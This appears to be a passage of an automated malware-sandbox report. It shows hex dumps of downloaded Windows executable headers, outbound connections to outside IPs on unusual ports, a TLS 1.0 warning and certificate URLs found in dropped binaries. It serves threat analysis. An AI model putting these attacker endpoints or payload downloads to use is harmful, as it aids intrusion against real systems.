00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ed ff a0 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 e4 0b 00 00 c0 70 02 00 00 00 00 20 e3 09 00 00 10 00 00 00 00 0c 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 7c 02 00 04 00 00 6a 61 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 e7 0b 00 64 00 00 00 00 80 7b 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 7b 02 94 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 d7 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 e3 0b 00 00 10 00 00 00 e4 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 00 0c 00 00 16 00 00 00 e8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 75 63 69 00 00 00 e5 02 00 00 00 70 7b 02 00 04 00 00 00 fe 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 3c 00 00 00 80 7b 02 00 3c 00 00 00 02 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 01 00 00 c0 7b 02 00 24 01 00 00 3e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:18 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:18 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:18 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:18 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:18 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:18 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:19 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:19 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:19 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:19 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:19 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Sat, 30 Oct 2021 12:11:19 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49826 version: TLS 1.0

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.3:49978 -> 93.115.20.139:28978
Source: global traffic	TCP traffic: 192.168.2.3:50095 -> 213.142.148.231:58682
Source: global traffic	TCP traffic: 192.168.2.3:50109 -> 185.215.113.94:15564
Source: global traffic	TCP traffic: 192.168.2.3:50115 -> 2.56.214.190:59628

URLs found in memory or binary data

Source: D8D0.exe.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: CD17.exe.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: D8D0.exe.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: CD17.exe.10.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: CD17.exe.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: D8D0.exe.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: CD17.exe.10.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: D8D0.exe.10.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: D8D0.exe.10.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: CD17.exe.10.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: D8D0.exe.10.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CD17.exe.10.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: B096.exe, B096.exe.10.dr	String found in binary or memory: http://fontello.com
